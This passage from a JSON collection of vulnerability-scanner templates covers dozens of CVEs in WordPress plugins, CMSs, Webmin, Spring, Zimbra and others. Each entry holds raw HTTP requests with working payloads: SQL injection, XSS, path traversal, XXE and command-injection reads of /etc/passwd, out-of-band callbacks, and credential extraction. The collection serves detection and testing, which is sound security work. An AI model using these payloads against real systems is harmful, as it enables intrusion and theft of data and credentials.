< 4.3.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)\n","GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_2 == 200","contains(content_type_2, \"text/javascript\")","contains(body_2, \"show_ilist_templates\")"],"condition":"and"}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32015","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)example\\.com\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-28023","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_supplier HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-31983","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2414","info":{"name":"FreeIPA - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /ca/rest/certrequests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<CertEnrollmentRequest>\n  <Attributes/>\n  <ProfileID>&ent;</ProfileID>\n</CertEnrollmentRequest>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["PKIException"]},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","<strong>IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 